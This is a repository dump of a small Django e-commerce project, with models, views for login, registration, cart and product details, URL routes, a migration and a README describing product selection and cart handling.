self.rewards[0:self.buffer_size]=r[0:self.buffer_size]\n self.dones[0:self.buffer_size]=t[0:self.buffer_size]\n self.next_states[0:self.buffer_size]=s2[0:self.buffer_size]\n \n self.filled=True\n self.pointer=0\n \n def size(self):\n if self.filled:\n return self.buffer_size\n else:\n return self.pointer\n \n def sample_batch(self,batch_size):\n \n if self.filled :\n# =============================================================================\n# print(\"reaching in filled\")\n# =============================================================================\n indexes=np.random.randint(low=0,high=self.buffer_size,size=batch_size)\n return self.states[indexes,:],self.actions[indexes,:],self.rewards[indexes,:], self.next_states[indexes, :]\n else:\n# =============================================================================\n# print(\"reaching if not filled\")\n# =============================================================================\n if self.size() > batch_size:\n# =============================================================================\n# print(\"Reaching size greater condition\")\n# =============================================================================\n \n indexes=np.random.randint(low=0,high=self.pointer,size=batch_size)\n return self.states[indexes,:],self.actions[indexes,:],self.rewards[indexes,:], self.next_states[indexes, :]\n \n \n \n \n def clear(self):\n self.states=np.zeros(shape=[self.buffer_size,self.state_dim])\n self.actions=np.zeros(shape=[self.buffer_size,self.action_dim])\n self.rewards=np.zeros(shape=[self.buffer_size,1])\n self.dones=np.zeros(shape=[self.buffer_size,1])\n self.next_states=np.zeros(shape=[self.buffer_size,self.state_dim])\n self.pointer=0\n self.filled=False\n \n \n \n \n \n \n \n \n \n \n " }, { "alpha_fraction": 0.48331698775291443, "alphanum_fraction": 0.49254170060157776, "avg_line_length": 45.19178009033203, "blob_id": "ca2d251db289d613eb3a5bdc7c74663fbe153696", "content_id": "69195f7b55ec679b8105a4d73079fd3890318eaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10190, "license_type": "no_license", "max_line_length": 199, "num_lines": 219, "path": "/Imitator.py", "repo_name": "testerpce/RL_Mtech_2_off_imitation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 10 19:07:41 2019\n\n@author: sayambhu\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nfrom Actor_critic_imitator import ActorNetwork, CriticNetwork\nimport gym\nfrom Replay_Buffer_np import ReplayBuffer\nfrom utils_imitate import OrnsteinUhlenbeckActionNoise#,build_summaries\n\nclass Imitator:\n \n def __init__(self,env,actor=None,critic=None,actor_lr=0.0001,critic_lr=0.001,\n gamma=0.99,tau=0.001,actor_bn=True,critic_bn=True,\n tensorboard_log=None,replay_buffer=None,batch_size=64,\n replay_buffer_size=50000,expert_buffer=None,\n expert_dir='TD3_BipedalWalkerv2_Unorm.npz',\n random_seed=999,summary_dir='./logs',\n max_episode_len=1000,buffer_size=1000):\n self.env=env\n self.state_dim=env.observation_space.shape[0]\n self.action_dim=env.action_space.shape[0]\n self.actor=actor\n self.critic=critic\n self.actor_lr=actor_lr\n self.critic_lr=critic_lr\n self.gamma=gamma\n self.tau=tau\n self.actor_bn=actor_bn\n self.critic_bn=critic_bn\n self.batch_size=batch_size\n self.buffer_size=buffer_size\n self.random_seed=random_seed\n self.max_episode_len=max_episode_len\n self.tensorboard_log=tensorboard_log\n self.replay_buffer=replay_buffer\n self.expert_buffer=expert_buffer\n self.expert_dir=expert_dir\n self.summary_dir=summary_dir\n \n self.summary_ops,self.summary_vars=self.build_summaries()\n \n self.sess=tf.Session()\n self.setup_models()\n \n def setup_models(self):\n if self.actor is None:\n print(\"setting up actor\")\n self.actor=ActorNetwork(sess=self.sess,\n state_dim=self.env.observation_space.shape[0],\n action_dim=self.env.action_space.shape[0],\n action_bound=self.env.action_space.high,\n learning_rate=self.actor_lr,\n tau=self.tau,\n batch_size=self.batch_size,\n actor_bn=self.actor_bn)\n if self.critic is None:\n print(\"setting up critic\")\n self.critic=CriticNetwork(sess=self.sess,\n state_dim=self.env.observation_space.shape[0],\n action_dim=self.env.action_space.shape[0],\n learning_rate=self.critic_lr,\n tau=self.tau,\n gamma=self.gamma,\n num_actor_vars=self.actor.get_num_trainable_vars(),\n critic_bn=self.critic_bn)\n \n if self.replay_buffer is None:\n print(\"Setting up replay buffer\")\n self.replay_buffer=ReplayBuffer(state_dim=self.state_dim,\n action_dim=self.action_dim,\n buffer_size=self.buffer_size,\n random_seed=self.random_seed)\n \n if self.expert_buffer is None:\n assert(self.expert_dir is not None)\n print(\"setting up expert buffer\")\n data=np.load(self.expert_dir)\n expert_len=len(data['obs'])\n self.expert_buffer=ReplayBuffer(state_dim=self.state_dim,\n action_dim=self.action_dim,\n buffer_size=expert_len,\n random_seed=self.random_seed)\n \n #Ignore the terminal part it says episode starts when replay \n #buffer is actually storing whether it is terminal or not\n# =============================================================================\n# for i in range(len(data['obs'])-1):\n# s=data['obs'][i]\n# a=data['actions'][i]\n# r=data['rewards'][i]\n# t= 0#data['episode_starts'][i+1]\n# s2=data['obs'][i+1]\n# self.expert_buffer.add(s,a,r,t,s2)\n# =============================================================================\n \n self.expert_buffer.expert_add(s=data['obs'],a=data['actions'],r=data['rewards'],t=data['episode_dones'],s2=data['obs_next'])\n \n \n \n def build_summaries(self):\n print(\"Building summaries\")\n episode_reward=tf.Variable(0.)\n tf.summary.scalar('episode_reward',episode_reward)\n episode_ave_max_q=tf.Variable(0.)\n tf.summary.scalar('Qmax_value',episode_ave_max_q)\n episode_expert_ave_max_q=tf.Variable(0.)\n tf.summary.scalar('Expert_Qmax_value',episode_expert_ave_max_q)\n summary_vars=[episode_reward,episode_ave_max_q,episode_expert_ave_max_q]\n summary_ops=tf.summary.merge_all()\n \n return summary_ops,summary_vars\n \n \n def train(self,num_episodes,actor_noise,writer):\n #build summaries, initialize global variables, make the writer\n #and first update actor and critic\n #Also initiate the expert buffer\n # for episodes: reset environment and set reward and ave max_q to\n #be zero now for max episode length: predict for current state the action\n #and store the result of that in buffer\n #If the buffer size is greater than the minibatch size, then\n #Sample from the buffer and the expert buffer\n #Train the critic. Use the gradients from the current states batch\n #Use it to get action gradients and train the actor\n # If terminal check the reward and break\n print (\"Getting into training\")\n for i in range(num_episodes):\n s=self.env.reset()\n ep_reward=0\n ep_ave_max_q=0\n ep_ave_max_q_expert=0\n \n for j in range(self.max_episode_len):\n \n a=self.actor.predict(np.reshape(s,(1,self.actor.s_dim)))+actor_noise()\n# =============================================================================\n# print(a[0])\n# =============================================================================\n s2,r,terminal,info=self.env.step(a[0])\n \n self.replay_buffer.add(np.reshape(s,(self.actor.s_dim,)),np.reshape(a,(self.actor.a_dim,)),r,terminal,np.reshape(s2,(self.actor.s_dim,)))\n \n if self.replay_buffer.size()>self.batch_size :\n \n s_batch,a_batch,r_batch,s2_batch=self.replay_buffer.sample_batch(self.batch_size)\n expert_s_batch,expert_a_batch,expert_r_batch,expert_s2_batch=self.expert_buffer.sample_batch(self.batch_size)\n \n target_q=self.critic.predict_target(s2_batch,self.actor.predict_target(s2_batch))\n \n expert_target_q=self.critic.predict_target(expert_s2_batch,self.actor.predict_target(expert_s2_batch))\n \n predicted_q_value,expert_q_value,_=self.critic.train(expert_s_batch,expert_a_batch,s_batch,a_batch,target_q,expert_target_q)\n# =============================================================================\n# print(\"predicted_q_value = \",predicted_q_value,\"exper_q_value\",expert_q_value)\n# =============================================================================\n \n ep_ave_max_q+=np.amax(predicted_q_value)\n ep_ave_max_q_expert+=np.amax(expert_q_value)\n \n a_outs=self.actor.predict(s_batch)\n grads=self.critic.action_gradients(s_batch,a_outs)\n \n self.actor.train(s_batch,grads[0])\n \n self.actor.update_target_network()\n self.critic.update_target_network()\n \n s=s2\n ep_reward+=r\n \n if terminal:\n# =============================================================================\n# print(\"ep_reward = \",ep_reward,\"ep_ave_max_q/float(j) = \",ep_ave_max_q/float(j),\"ep_ave_max_q_expert/float(j) = \",ep_ave_max_q_expert/float(j))\n# =============================================================================\n summary_str=self.sess.run(self.summary_ops,feed_dict={self.summary_vars[0]:ep_reward,self.summary_vars[1]:ep_ave_max_q/float(j),self.summary_vars[2]:ep_ave_max_q_expert/float(j)})\n writer.add_summary(summary_str,i)\n writer.flush()\n print('| Reward:{:d} | Episode:{:d}| Qmax:{:.4f} | Expert_Qmax:{:.4f}'.format(int(ep_reward),i,(ep_ave_max_q/float(j)),(ep_ave_max_q_expert/float(j))))\n break\n \n \n #This is where you stopped\n \n \n \n def learn(self,num_episodes=1000):\n \n print(\"Getting into learn\")\n #call the train function I guess\n self.sess.run(tf.global_variables_initializer())\n \n writer=tf.summary.FileWriter(self.summary_dir,self.sess.graph)\n self.actor.update_target_network()\n self.critic.update_target_network()\n \n self.actor_noise=OrnsteinUhlenbeckActionNoise(mu=np.zeros(self.env.action_space.shape[0]))\n \n \n self.train(num_episodes=num_episodes,actor_noise=self.actor_noise,writer=writer)\n \n \n \n \n\n\n\n\n\n# =============================================================================\n# env=gym.make('BipedalWalker-v2')\n# state_dim=env.observation_space.shape[0]\n# action_bound=env.action_space.high\n# =============================================================================\n\n \n \n \n \n \n \n \n \n \n" }, { "alpha_fraction": 0.5598297715187073, "alphanum_fraction": 0.5708790421485901, "avg_line_length": 44.91353225708008, "blob_id": "ceca11083a51f5439da3574b7d38971e70c32863", "content_id": "6b832460e302cc777fe1aabae4c785213de5b16a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12218, "license_type": "no_license", "max_line_length": 229, "num_lines": 266, "path": "/Actor_critic_imitator.py", "repo_name": "testerpce/RL_Mtech_2_off_imitation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 10 23:49:44 2019\n\n@author: sayambhu\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nimport tflearn\n\n\nclass ActorNetwork(object):\n \"\"\"\n Using almost same actor as ddpg except I am keeping batch normalization\n to be an option\n \"\"\"\n \n def __init__(self,sess, state_dim,action_dim,action_bound,learning_rate,tau,batch_size,actor_bn=True):\n self.sess=sess\n self.s_dim=state_dim\n self.a_dim=action_dim\n self.action_bound=action_bound\n self.learning_rate=learning_rate\n self.tau=tau\n self.batch_size=batch_size\n self.actor_bn=actor_bn\n \n #Actor Network\n self.inputs,self.out,self.scaled_out=self.create_actor_network(reuse=False,original=True)\n \n self.network_params=tf.trainable_variables(\"actor\")\n \n #Target Network\n self.target_inputs,self.target_out,self.target_scaled_out=self.create_actor_network(reuse=False,original=False)\n self.target_network_params=tf.trainable_variables(\"target_a\")#[len(self.network_params):]\n \n# =============================================================================\n# print(\"actor params = \",self.network_params,\"target actor params = \",self.target_network_params)\n# =============================================================================\n \n #Op for periodically updating target network with online network\n self.update_target_network_params=[self.target_network_params[i].assign(tf.multiply(self.network_params[i],self.tau)+tf.multiply(self.target_network_params[i],1.-self.tau)) for i in range(len(self.target_network_params))]\n \n #This gradient will be provided by critic network\n self.action_gradient=tf.placeholder(tf.float32,[None,self.a_dim])\n \n #Combine gradients here\n self.unnormalized_actor_gradients=tf.gradients(self.scaled_out,self.network_params,-self.action_gradient)\n# =============================================================================\n# print(self.unnormalized_actor_gradients)\n# =============================================================================\n self.actor_gradients=list(map(lambda x: tf.div(x,self.batch_size),self.unnormalized_actor_gradients))\n \n #Optimization op\n self.optimize=tf.train.AdamOptimizer(self.learning_rate).apply_gradients(zip(self.actor_gradients,self.network_params))\n \n self.num_trainable_vars=len(self.network_params)+len(self.target_network_params)\n \n \n def create_actor_network(self,reuse=False,original=True):\n \n inputs=tflearn.input_data(shape=[None,self.s_dim])\n \n if original:\n ns=\"actor\"\n else:\n ns=\"target_a\"\n \n with tf.variable_scope(ns) as scope:\n \n if reuse:\n tf.get_variable_scope().reuse_variables()\n \n if self.actor_bn:\n net=tflearn.fully_connected(inputs,400,name=\"FC_1\")\n net=tflearn.layers.normalization.batch_normalization(net)\n net=tflearn.activations.relu(net)\n net=tflearn.fully_connected(net,300,name=\"FC_2\")\n net=tflearn.layers.normalization.batch_normalization(net)\n net=tflearn.activations.relu(net)\n \n else:\n net=tflearn.fully_connected(inputs,64,name=\"FC_1\")\n net=tflearn.activations.relu(net)\n net=tflearn.fully_connected(net,64,name=\"FC_2\")\n net=tflearn.activations.relu(net)\n \n #Final layer weights between -0.003 to 0.003\n w_init=tflearn.initializations.uniform(minval=-0.003,maxval=0.003)\n out=tflearn.fully_connected(net,self.a_dim,activation='tanh',weights_init=w_init)\n \n scaled_out=tf.multiply(out,self.action_bound)\n return inputs,out,scaled_out\n \n def train(self,inputs,a_gradient):\n return self.sess.run(self.optimize,feed_dict={self.inputs:inputs,self.action_gradient:a_gradient})\n \n def predict(self,inputs):\n return self.sess.run(self.scaled_out,feed_dict={self.inputs:inputs})\n \n def predict_target(self,inputs):\n return self.sess.run(self.target_scaled_out,feed_dict={self.target_inputs:inputs})\n \n def update_target_network(self):\n self.sess.run(self.update_target_network_params)\n \n def get_num_trainable_vars(self):\n return self.num_trainable_vars\n\nclass CriticNetwork(object):\n \"\"\"\n Same as ddpg but with optional batch normalization \n and a separate loss function\n \"\"\"\n \n def __init__(self,sess,state_dim,action_dim,learning_rate,tau,gamma,num_actor_vars,critic_bn=True):\n self.sess=sess\n self.s_dim=state_dim\n self.a_dim=action_dim\n self.learning_rate=learning_rate\n self.tau=tau\n self.gamma=gamma\n self.critic_bn=critic_bn\n \n# =============================================================================\n# self.expert_inputs=tflearn.input_data(shape=[None,self.s_dim])\n# self.expert_action=tflearn.input_data(shape=[None,self.a_dim])\n# =============================================================================\n \n #create the critic network\n self.inputs,self.action,self.out=self.create_critic_network(reuse=False,original=True)\n self.network_params=tf.trainable_variables(\"critic\")#[num_actor_vars:]\n \n #Target network\n self.target_inputs,self.target_action,self.target_out=self.create_critic_network(reuse=False,original=False)\n self.target_network_params=tf.trainable_variables(\"target_c\")#[(len(self.network_params)+num_actor_vars):]\n \n #Expert network params\n self.expert_inputs,self.expert_action,self.expert_out=self.create_critic_network(reuse=True,original=True)\n self.expert_network_params=tf.trainable_variables(\"critic\")#[(len(self.network_params)+num_actor_vars+len(self.target_network_params)):]\n \n# =============================================================================\n# print(\"actor params = \",num_actor_vars,\"critic params =\",self.network_params,\"expert params =\",self.expert_network_params,\"target params = \",self.target_network_params,\"total params = \",tf.trainable_variables())\n# =============================================================================\n \n #Op for periodically updating target network with online network\n self.update_target_network_params=[self.target_network_params[i].assign(tf.multiply(self.network_params[i],self.tau)+tf.multiply(self.target_network_params[i],1.-self.tau)) for i in range(len(self.target_network_params))]\n# =============================================================================\n# self.update_network_to_expert_params=[self.expert_network_params[i].assign(self.network_params[i]) for i in range(len(self.expert_network_params))]\n# self.update_expert_to_network_params=[self.network_params[i].assign(self.expert_network_params[i]) for i in range(len(self.network_params))]\n# \n# =============================================================================\n \n #Network target y[i]\n self.predicted_q_value=tf.placeholder(tf.float32,[None,1])\n self.expert_q_value=tf.placeholder(tf.float32,[None,1])\n \n #Define loss and optimization op\n self.loss=self.JS_loss(self.expert_q_value,self.expert_out,self.predicted_q_value,self.out,self.gamma)\n self.optimize=tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)\n \n #Gradient of output (i.e. Q value) is taken with respect to the action\n self.action_grads=tf.gradients(self.out,self.action)\n \n def JS_loss_expert(self,predicted_q_value,out,gamma):\n \n predicted_q_value=tf.math.pow(predicted_q_value,gamma)\n def KL_loss(p,q):\n kl=p*tf.math.log(p+1e-12)-p*tf.math.log(q+1e-12)+(1.-p)*tf.math.log(1.-p+1e-12)-(1.-p)*tf.math.log(1.-q+1e-12)\n \n return kl\n M=(predicted_q_value+out)/2\n L1=KL_loss(out,M)\n L2=KL_loss(predicted_q_value,M)\n JSD_E=0.5*(L1+L2)\n \n return JSD_E\n \n def JS_loss_non_expert(self,predicted_q_value,out,gamma):\n \n predicted_q_value=tf.math.pow(predicted_q_value,gamma)/2\n def KL_loss(p,q):\n kl=p*tf.math.log(p+1e-12)-p*tf.math.log(q+1e-12)+(1.-p)*tf.math.log(1.-p+1e-12)-(1.-p)*tf.math.log(1.-q+1e-12)\n \n return kl\n M=(predicted_q_value+out)/2\n L1=KL_loss(out,M)\n L2=KL_loss(predicted_q_value,M)\n JSD_NE=0.5*(L1+L2)\n \n return JSD_NE\n \n def JS_loss(self,expert_predicted_q_value,expert_out,\n predicted_q_value,out,gamma):\n \n return self.JS_loss_expert(expert_predicted_q_value,\n expert_out,\n gamma)+self.JS_loss_non_expert(predicted_q_value,\n out,gamma)\n \n def create_critic_network(self,reuse=False,original=True):\n inputs=tflearn.input_data(shape=[None,self.s_dim])\n action=tflearn.input_data(shape=[None,self.a_dim])\n \n if original:\n ns=\"critic\"\n else:\n ns=\"target_c\"\n \n with tf.variable_scope(ns) as scope:\n \n if reuse:\n tf.get_variable_scope().reuse_variables()\n \n if self.critic_bn:\n net=tflearn.fully_connected(inputs,400)\n net=tflearn.layers.normalization.batch_normalization(net)\n net=tflearn.activations.relu(net)\n \n #Adding action in second hidden layer\n t1=tflearn.fully_connected(net,300)\n t2=tflearn.fully_connected(action,300)\n net=tflearn.activation(tf.matmul(net,t1.W)+tf.matmul(action,t2.W)+t2.b,activation='relu')\n \n \n else:\n net=tflearn.fully_connected(inputs,64)\n net=tflearn.activations.relu(net)\n t1=tflearn.fully_connected(net,64)\n t2=tflearn.fully_connected(action,64)\n net=tflearn.activation(tf.matmul(net,t1.W)+tf.matmul(action,t2.W)+t2.b,activation='relu')\n \n #linear layer connected to one output representing Q(s,a)\n w_init=tflearn.initializations.uniform(minval=-0.003,maxval=0.003)\n out=tflearn.fully_connected(net,1,weights_init=w_init,activation='sigmoid')\n \n return inputs,action,out\n \n def train(self,expert_inputs,expert_actions,inputs,action,predicted_q_value,expert_q_value):\n return self.sess.run([self.out,self.expert_out,self.optimize],feed_dict={self.expert_inputs:expert_inputs,\n self.expert_action:expert_actions,\n self.inputs:inputs,self.action:action,\n self.predicted_q_value:predicted_q_value,\n self.expert_q_value:expert_q_value})\n \n def predict_target(self,inputs,action):\n return self.sess.run(self.target_out,feed_dict={self.target_inputs:inputs,self.target_action:action})\n \n def predict(self,inputs,action):\n return self.sess.run(self.out,feed_dict={self.inputs:inputs,self.action:action})\n \n def action_gradients(self,inputs,actions):\n return self.sess.run(self.action_grads,feed_dict={self.inputs:inputs,self.action:actions})\n \n def update_target_network(self):\n self.sess.run(self.update_target_network_params)\n \n# =============================================================================\n# def update_network_to_expert(self):\n# self.sess.run(self.update_network_to_expert_params)\n# \n# def update_expert_to_network(self):\n# self.sess.run(self.update_expert_to_network_params)\n# =============================================================================\n \n" }, { "alpha_fraction": 0.6101694703102112, "alphanum_fraction": 0.6338983178138733, "avg_line_length": 25.795454025268555, "blob_id": "3af4d6afc373acbc6b2e66f452bff539fa0075cb", "content_id": "915f1d71a2473dc85de72849b578f1142c7142a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1180, "license_type": "no_license", "max_line_length": 127, "num_lines": 44, "path": "/utils_imitate.py", "repo_name": "testerpce/RL_Mtech_2_off_imitation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 12 23:57:35 2019\n\n@author: sayambhu\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\n\n\n\nclass OrnsteinUhlenbeckActionNoise:\n def __init__(self,mu,sigma=0.3,theta=0.15,dt=1e-2,x0=None):\n self.theta=theta\n self.mu=mu\n self.sigma=sigma\n self.dt=dt\n self.x0=x0\n self.reset()\n \n def __call__(self):\n x=self.x_prev+self.theta*(self.mu-self.x_prev)*self.dt+self.sigma*np.sqrt(self.dt)*np.random.normal(size=self.mu.shape)\n self.x_prev=x\n \n return x\n \n def reset(self):\n self.x_prev=self.x0 if self.x0 is not None else np.zeros_like(self.mu)\n \n def __repr__(self):\n return 'OrnsteinUhlenbeckActionNoise(mu={},sigma={})'.format(self.mu,self.sigma)\n \n#Tensorflow summary ops\n\ndef build_summaries():\n episode_reward=tf.Variable(0.)\n tf.summary.scalar('episode_reward',episode_reward)\n episode_ave_max_q=tf.Variable(0.)\n tf.summary.scalar('Qmax_value',episode_ave_max_q)\n summary_vars=[episode_reward,episode_ave_max_q]\n summary_ops=tf.summary.merge_all()\n \n return summary_ops,summary_vars\n\n" }, { "alpha_fraction": 0.7846890091896057, "alphanum_fraction": 0.7894737124443054, "avg_line_length": 40.79999923706055, "blob_id": "d5c5edb1636ba7aa9d24ffe27880ae89a452e1c5", "content_id": "280d466ea9b7f61beb69e52957c9a768e4780e2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 209, "license_type": "no_license", "max_line_length": 97, "num_lines": 5, "path": "/README.md", "repo_name": "testerpce/RL_Mtech_2_off_imitation", "src_encoding": "UTF-8", "text": "# RL_Mtech_2_off_imitation\nThe second part of my Mtech project where I work on Off policy imitation learning\n\n\nIn order to run the whole program make sure all files are in same folder and run Test_Imitator.py\n" } ]
6
furkhan26/Ecommer-website--django
https://github.com/furkhan26/Ecommer-website--django
8a723607cd7fef1e812795bf64a55182dc63e7fe
12e73f924dc6a11a4dc5c852db4c9352d6fee548
687820b3c26e199f45bcea0275bedb5f785b8f7f
refs/heads/master
2023-03-20T03:29:06.375561
2021-03-19T18:39:49
2021-03-19T18:39:49
336,041,385
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7020407915115356, "alphanum_fraction": 0.7020407915115356, "avg_line_length": 25.33333396911621, "blob_id": "b7d88ab6663d03b6bd3948dec0e6036dcd8f730b", "content_id": "ef3ad59f054376f3e5afb7a8a505dfcb9c2c6724", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 245, "license_type": "no_license", "max_line_length": 43, "num_lines": 9, "path": "/main/forms.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "from django.forms import ModelForm\nfrom django.contrib.auth.models import User\nfrom .models import Products,CartDetails\nfrom django import forms\n\nclass UserData(ModelForm):\n class Meta:\n model = User\n fields = '__all__'\n " }, { "alpha_fraction": 0.5888594388961792, "alphanum_fraction": 0.5899204015731812, "avg_line_length": 31.5, "blob_id": "ed27158e30867504f0722fe265dbbf65dafcddf1", "content_id": "fd35072ae515dfa77268cef976ad0a4164cb78cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1885, "license_type": "no_license", "max_line_length": 111, "num_lines": 58, "path": "/accounts/views.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User, auth\nfrom main.models import *\n# Create your views here.\n\n\ndef login(request):\n if request.method == 'POST':\n email = request.POST['email']\n password = request.POST['password']\n user = auth.authenticate(request, username=email, password=password)\n if user is not None:\n auth.login(request, user)\n return redirect('/')\n else:\n messages.info(request, 'invalid details')\n return redirect('login')\n else:\n return render(request, \"login.html\")\n\n\ndef register(request):\n if request.method == 'POST':\n username = request.POST.get('email', False)\n email = request.POST['email']\n name = request.POST['name']\n number = request.POST['number']\n gender = request.POST['gender']\n print(gender)\n password1 = request.POST['pass']\n repassword = request.POST['repass']\n if password1 == repassword:\n if User.objects.filter(username=email).exists():\n messages.info(request, 'this email already registered')\n return redirect('register')\n else:\n\n user_ = User.objects.create_user(username=email, password=password1)\n \n customer=Customer.objects.create(user=user_,name=name,email=email,number=number,gender=gender,)\n customer.save()\n user_.save()\n print('user created')\n return redirect('/')\n else:\n messages.info(request, 'password not match')\n return redirect('register')\n return redirect('/')\n else:\n\n return render(request, \"register.html\")\n\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('/')\n" }, { "alpha_fraction": 0.8135592937469482, "alphanum_fraction": 0.8135592937469482, "avg_line_length": 28.5, "blob_id": "386ec09f7e9ba2e0dc07658415a9844d1a65a34f", "content_id": "3ee906e723eeef07e7f1af3bb1f226cac20d8eda", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 32, "num_lines": 6, "path": "/main/admin.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import *\n# Register your models here.\nadmin.site.register(Products)\nadmin.site.register(CartDetails)\nadmin.site.register(Customer)\n" }, { "alpha_fraction": 0.7275661826133728, "alphanum_fraction": 0.7275661826133728, "avg_line_length": 31.29166603088379, "blob_id": "31d95230cbbff49755cc6a7e126791675f4e57fb", "content_id": "6c6e6016f9fa7898715fae18e437a99dda9dbfde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1549, "license_type": "no_license", "max_line_length": 105, "num_lines": 48, "path": "/main/views.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom .models import Products,CartDetails,Customer\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse, JsonResponse\nfrom .forms import UserData\nimport uuid,random\n\nimport datetime\nfrom time import strftime\n\n# Create your views here.\ndef index(request):\n login_user = request.user\n products=Products.objects.all()\n # custId = Customer.objects.get(user_id=login_user)\n # item_count = CartDetails.objects.filter(id_customer=custId).count()\n if 'add_item' in request.POST:\n prod_id = request.POST['getitemId']\n db_products = Products.objects.get(id=prod_id)\n added_time = strftime(\"%Y-%m-%d %H:%M:%S\")\n # save_to_cart = CartDetails(id_product=db_products,date_cart=added_time,id_customer=custId).save()\n\n return render(request,'home.html',{'products':products}) \n\ndef productdetails(request,slug):\n sl=Products.objects.get(slug=slug)\n \n return render(request,'product-details.html',{'sl':sl})\n\ndef order_details(request):\n custId = Customer.objects.get(user_id=request.user)\n cart_db = CartDetails.objects.filter(id_customer=custId)\n print(cart_db)\n\n return render(request,'order_details.html',{'cart_db':cart_db})\n\ndef checkout(request):\n return render(request,'checkout.html')\n\ndef collection(request):\n return render(request,'collection.html')\n\ndef userprofile(request):\n user_ = str(request.user.username)\n form_ = UserData() #instance to be added here\n print(user_)\n\n return render(request,'userprofile.html',{'form_':form_})" }, { "alpha_fraction": 0.5210946202278137, "alphanum_fraction": 0.5518814325332642, "avg_line_length": 31.481481552124023, "blob_id": "60756d08032d0205aacf58d8600a1116c521879a", "content_id": "cfca6151006df51ce960a114c6cca52a801099e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 877, "license_type": "no_license", "max_line_length": 114, "num_lines": 27, "path": "/main/migrations/0001_initial.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.0.5 on 2020-12-30 18:33\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Products',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=100)),\n ('img', models.ImageField(upload_to='static/images')),\n ('price', models.FloatField()),\n ('delprice', models.FloatField()),\n ('category', models.CharField(max_length=100, null=True)),\n ('brand', models.CharField(max_length=100, null=True)),\n ('color', models.CharField(max_length=100, null=True)),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.709172248840332, "alphanum_fraction": 0.709172248840332, "avg_line_length": 39.6363639831543, "blob_id": "b0914bc05e994e97d967564947e195cb5040a069", "content_id": "45615a65443b28fca2a89526446d9bc51ace444e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 447, "license_type": "no_license", "max_line_length": 84, "num_lines": 11, "path": "/main/urls.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "from django.urls import path,include\nfrom . import views\n\nurlpatterns = [\n path('',views.index,name='index'),\n path('collection/',views.collection,name='collection'),\n path('product-details/<str:slug>/',views.productdetails,name='product-details'),\n path('order_details/',views.order_details, name=\"order_details\"),\n path('checkout/',views.checkout,name='checkout'),\n path('userprofile/',views.userprofile,name='userprofile'),\n]\n" }, { "alpha_fraction": 0.8169934749603271, "alphanum_fraction": 0.8169934749603271, "avg_line_length": 37.25, "blob_id": "ac12f988145462f3566053cb9dc114c58f11759b", "content_id": "fa5392796945140017374c2de3d331e6835d6539", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 153, "license_type": "no_license", "max_line_length": 92, "num_lines": 4, "path": "/README.md", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "# Ecommer-website--django\n\nWhere user can select products and cart is maintained, user should enter while checking out.\ncan manipulate product quantitys\n" }, { "alpha_fraction": 0.716183602809906, "alphanum_fraction": 0.7326892018318176, "avg_line_length": 44.83333206176758, "blob_id": "8fe05d1cf728aab811bdbddc2242ee2e5cb1942a", "content_id": "ac09a623d067cddcfde58d7f29dc1eeb79328d31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2484, "license_type": "no_license", "max_line_length": 93, "num_lines": 54, "path": "/main/models.py", "repo_name": "furkhan26/Ecommer-website--django", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.conf import settings\nfrom django.utils.text import slugify\nfrom django.contrib.auth.models import User\n# Create your models here.\n\nclass Customer(models.Model):\n user = models.OneToOneField(\n User, on_delete=models.CASCADE, null=True, blank=True)\n name = models.CharField(max_length=200, null=True)\n email = models.CharField(max_length=50, null=True)\n gender = models.CharField(max_length=50, null=True)\n number = models.CharField(max_length=50, null=True)\n\nclass Products(models.Model):\n name = models.CharField(max_length=100,null=True, blank=True)\n img = models.ImageField(upload_to='static/images')\n price = models.FloatField()\n delprice= models.FloatField()\n category=models.CharField(max_length=100,null=True, blank=True)\n brand=models.CharField(max_length=100,null=True, blank=True)\n color=models.CharField(max_length=100,null=True, blank=True)\n slug=models.SlugField(max_length=200,unique=True,null=True, 